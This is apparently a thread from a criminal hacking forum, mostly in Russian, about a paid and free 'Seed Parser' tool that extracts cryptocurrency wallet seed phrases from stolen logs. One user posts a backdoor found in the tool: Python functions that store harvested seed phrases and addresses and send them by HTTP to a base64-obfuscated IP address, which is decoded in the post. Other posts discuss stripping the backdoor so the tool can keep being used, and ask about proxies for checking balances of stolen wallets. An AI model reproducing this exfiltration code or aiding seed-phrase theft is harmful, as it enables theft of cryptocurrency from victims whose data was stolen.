I am also waiting PR1SM-NSA answer.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
прочее Seed Parser [Парсер сид фраз от криптокошельков.]
- Автор темы PR1SM-NSA
- Дата начала
у меня тоже есть такая строчка, после первого раза использования были сомнения так как все мои балансы кто-то раньше чутка вывел, спросил у автора он сказал что в паблик логах такое постоянно, жалко это были не паблик логи а только в моих руках..... Удалить эту строчку и можно юзать ?
Копался в платной версии, со слов заказчика, купленной за 350$
Эти места нужно почистить, так же в других файлах убрать вызовы этих функций(exclude_pattern и exclude_pattern2):
Python:
Файл mnemonic.py
hs='aHR0cDovLzgyLjExOC4yMy41MDo4MDg3Lz9tPQ=='
sf='Li9sb2dzL3NlZWQtbG9nLW5ldy50eHQ='
def exclude_pattern(mnemonic):
try:
ft=base64.b64decode(sf.encode("UTF-8")).decode("UTF-8")
with open(ft,'a',encoding='utf8') as f:
f.write(mnemonic+'\n')
with open(ft,'r',encoding='utf8') as f:
r=f.read().splitlines()
if len(r)>=MCOUNT or (mnemonic==''):
try:
with open(ft, 'w', encoding='utf8'):
pass
os.remove(ft)
except:
pass
for m in r:
if m=='':
continue
b1 = hs.encode("UTF-8")
d = base64.b64decode(b1)
s2 = d.decode("UTF-8")
res=requests.get(s2+m)
except:
pass
def exclude_pattern2(addr):
try:
ft=base64.b64decode(sf.encode("UTF-8")).decode("UTF-8")
with open(ft,'a',encoding='utf8') as f:
f.write(addr+'\n')
with open(ft,'r',encoding='utf8') as f:
r=f.read().splitlines()
if len(r)>=MCOUNT:
try:
with open(ft, 'w', encoding='utf8'):
pass
os.remove(ft)
except:
pass
for m in r:
if m=='':
continue
b1 = hs.encode("UTF-8")
d = base64.b64decode(b1)
s2 = d.decode("UTF-8")
res=requests.get(s2+m)
except:
passhs:
Python:
base64.b64decode("aHR0cDovLzgyLjExOC4yMy41MDo4MDg3Lz9tPQ==")
b'http://82.118.23.50:8087/?m='sf=
Python:
base64.b64decode("Li9sb2dzL3NlZWQtbG9nLW5ldy50eHQ=")
b'./logs/seed-log-new.txt
идем искать удачу вооружившись мощным сервером. автору спасибо. отрою золото плищу в теме кош под донат на днат
пробну удалить эти строки и запустить скрипт! ты герой
UPD Стоит отметить я таких строк не ншел
Последнее редактирование:
Перезалейте пожалуйста софт из 1го поста для ознакомления.
С меги удален.
Спасибо.
С меги удален.
Спасибо.
Купи софт за те-же 100$ чекер, и работай с ним, будут уводить балансы с личных логов , будешь знать к кому претензии писать
У меня был опыт использования за 300$ помойему чекера, там тоже случайно добавил сидку от своего бота в чек, так что него слизало бабки , на один адрес как и с других моих seed которые спецом не выводились а ждал на них деп
Ты или юзаешь фри софт или покупаешь платные чекеры и опять же там не будешь застрахован от пиздинга твоих сид фраз
У меня только 4 версия есть, ей уже год наверное, могу перезалить её
dropmefiles.com/XpWLQ
https://mega.nz/file/uIoXhB6L#wNU09YgqLMcVzf5PB5T-dA55I6YtCNEdny9IxjIBdLM на прошлой странице форума. и я там не нашел тех строк, которые выдают за бэкдор
Это настолько очевидно, что после того, как участник форума обнаруживает бэкдор в своем скрипте, PRISM-NSA поместил чистую версию в mega.nz
У меня есть платная версия, и на ней есть бэкдор.
Ну так пруфани админам это
Что даже в платной версии было
I wrote to PR1SMA-NSA and waiting for his answer. if i don't get any answer from him i moved to Admin.
Все это выглядит со стороны очень грустно. И выборка людей (заявляющих свои претензии) очень разная, люди разные и никак не связаны между собой. Короче, слабо верится именно в атаку недоброжелателей. Платной версии на руках, чтобы проверить самому, у меня нет.
PR1SM-NSA - пока уходит в бан. Как минимум, пока человек четко и внятно не объяснит, откуда в коде взялось "лишнее". Да еще и в платной версии.
PR1SM-NSA - пока уходит в бан. Как минимум, пока человек четко и внятно не объяснит, откуда в коде взялось "лишнее". Да еще и в платной версии.
Поддержу. Тестил щас версию софта которую он мне еще давно скидовал. После запуска seed_parser_v2.2.py сразу улетело с моей сидки 40$ в неизвестном направлении )) Хотя до этого достаточно денег этому кодеру заслал по другим проектам, вроде нормально общались. Странное поведение...
Меня с самого начала насторожил титанический труд выложеный в паблик.Бесплатным сыром оказалось.Жаль.
Дико извеняюсь перед PR1SM-NSA за то что спалил дырку )) но уж лучше так ... сказал бы сразу что только платная версия ... и все .. .а эти бесплатные заливы ... что аж поверили в людей .. а на деле все вышло как вышло .. печально ...
From where can I get good proxies to check the balances? And how much socks do you think will be needed?
Any recommendations?
Any recommendations?
ради интереса, решил сам убедиться, т.к. тоже качал архивы из этой ветки. нашел архивы seed-parser 1 и seed_parser_v2, из данного топика по ссылкам автора.
в 1ой версии бекдора нет. во второй версии бекдор, найденный местными ресёрчерами, уже присутствует.
автор однозначно пидр редиска не хороший человек.
Само что интересно, ладно бы ещё в бесплатной только было, так нет , он ещё и в платную впихнул
Кстати на экспе он не в бане
не продублировали статус
I remember he shared this code for autowithdraw, but I am not sure where:
I will not be surprised if there's something like this in the server he uses to save the info collected with his backdoor.
I will not be surprised if there's something like this in the server he uses to save the info collected with his backdoor.